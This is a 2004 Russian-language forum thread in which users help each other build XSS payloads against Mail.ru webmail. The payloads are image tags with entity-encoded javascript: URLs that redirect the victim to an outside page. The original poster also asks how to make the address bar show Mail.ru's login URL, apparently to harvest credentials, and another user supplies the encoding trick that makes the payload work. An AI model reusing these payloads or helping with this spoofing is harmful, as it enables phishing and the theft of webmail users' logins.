ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Mail.ru: два глупых вопроса
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mail.ru: два глупых вопроса
  #1  
Старый 14.12.2004, 06:50
govorunov
Новичок
Регистрация: 14.12.2004
Сообщений: 2
Провел на форуме:
1207

Репутация: 0
Question Mail.ru: два глупых вопроса
1.
Ну, допустим, есть скрипт:
<image src=javascript&#10:alert(xss)>
Действительно работает (в смысле alert выдает).

Но вот что писать вместо [alert(xss)] если мне надо замутить редирект на http://pupkin.ru/vasya.html (автоматически и в том же окне)?
Пытался сделать так:
<image src=javascript&#10:document.location.replace('http://pupkin.ru/vasya.html')>
или
<image src=javascript&#10:onLoad=window.location=("http://pupkin.ru/vasya.html")>
Без мазы.
Есть подозрения, что я облажался с синтаксисом.

Есть еще такая штука:
<SCRIPT type="text/javascript" LANGUAGE="JavaScript">
<!--
if (self.parent.frames.length == 0)
self.parent.location="http://pupkin.ru/vasya.html";
// -->
</SCRIPT>
Но как это все оформить в одну строчку???



2.
А кто-нибудь знает можно ли заменить в адресной строке [http://pupkin.ru/vasya.html] например на [http://win.mail.ru/cgi-bin/auth] или хотя бы отключить кнопку "Back"?
 
Ответить с цитированием

  #2  
Старый 15.12.2004, 00:22
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
короче, двигай сюда http://antichat.ru/crackchat/HTML/ и кодируй строку
Цитата:
document.location.replace
в 10-ичную кодировку, и все получится...
 
Ответить с цитированием

virgoz, спасибо за подсказку!
  #3  
Старый 15.12.2004, 05:20
govorunov
Новичок
Регистрация: 14.12.2004
Сообщений: 2
Провел на форуме:
1207

Репутация: 0
По умолчанию virgoz, спасибо за подсказку!
ИЕС. Я СДЕЛАЛ ЭТО!

Но все-таки повторю свой второй вопрос (может кто знает):

Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?

Есть ли у кого на примете скрипты для этого?
 
Ответить с цитированием

  #4  
Старый 15.12.2004, 12:30
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию
2govorunov
А ты на какой почте юзал?
 
Ответить с цитированием

  #5  
Старый 15.12.2004, 17:46
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
Цитата:
Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?
зайди на rootlab.ru, покрути там новостную ленту, все будет написано...
 
Ответить с цитированием

  #6  
Старый 16.12.2004, 06:42
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию
Подскажите почему не срабатывает <image src=javascript&#10:document.location.replace('http://pupkin.ru/va sya.html')>
 
Ответить с цитированием

  #7  
Старый 16.12.2004, 06:46
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию
да уж.... там было все 10-тичной кодировки ....так работает отправляю с Outlook на mail.ru как HTML открываю ящик и ничего...кроме текста.... что тут не так ?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ